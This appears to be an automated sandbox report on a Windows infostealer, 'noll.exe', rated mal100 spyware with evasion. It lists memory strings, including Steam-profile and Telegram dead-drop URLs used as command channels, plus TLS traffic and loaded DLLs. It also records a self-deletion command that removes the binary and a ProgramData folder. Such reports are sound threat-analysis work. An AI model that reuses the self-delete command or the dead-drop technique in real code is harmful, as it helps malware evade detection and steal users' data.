                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: noll.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869I
                            Source: noll.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/w
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/F
                            Source: noll.exeString found in binary or memory: https://t.me/ae5ed
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed&
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5edC
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5edg
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5edj
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5edm
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                            Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49713 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49725 version: TLS 1.2

                            System Summary

                            barindex
                            Source: noll.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008145B GetCurrentProcess,NtQueryInformationProcess,0_2_0008145B
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009C4720_2_0009C472
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000AD9330_2_000AD933
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000AD1C30_2_000AD1C3
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009950A0_2_0009950A
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000ADD1B0_2_000ADD1B
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000ACD2E0_2_000ACD2E
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000AD5610_2_000AD561
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009B7120_2_0009B712
                            Source: C:\Users\user\Desktop\noll.exeCode function: String function: 000904E7 appears 36 times
                            Source: C:\Users\user\Desktop\noll.exeCode function: String function: 00090609 appears 71 times
                            Source: C:\Users\user\Desktop\noll.exeCode function: String function: 000847E8 appears 38 times
                            Source: noll.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/2@3/2
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000914A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_000914A5
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00091807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00091807
                            Source: C:\Users\user\Desktop\noll.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htmJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                            Source: C:\Users\user\Desktop\noll.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                            Source: noll.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\Desktop\noll.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: noll.exeReversingLabs: Detection: 81%
                            Source: unknownProcess created: C:\Users\user\Desktop\noll.exe "C:\Users\user\Desktop\noll.exe"
                            Source: C:\Users\user\Desktop\noll.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                            Source: C:\Users\user\Desktop\noll.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exitJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: rasadhlp.dllJump to behavior
